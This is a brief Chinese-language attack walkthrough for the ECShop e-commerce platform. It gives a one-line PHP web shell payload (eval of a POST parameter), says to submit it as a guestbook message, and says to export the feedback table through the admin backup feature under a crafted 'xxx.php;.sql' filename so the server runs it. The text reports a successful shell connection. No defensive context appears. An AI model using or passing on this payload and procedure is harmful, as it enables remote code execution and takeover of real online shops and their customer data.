ECSHOP网站程序可以绕过权限上传一句话木马

可以绕过权限上传一句话木马

前台留个言，内容是我们的一句话木马：<?php eval($_POST[cmd]);?>

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份，选择ecs_feedback这张表（存放留言的表）

备份文件名：xxx.php;.sql 这种格式来备份

提示成功了。 

 

一句话连接成功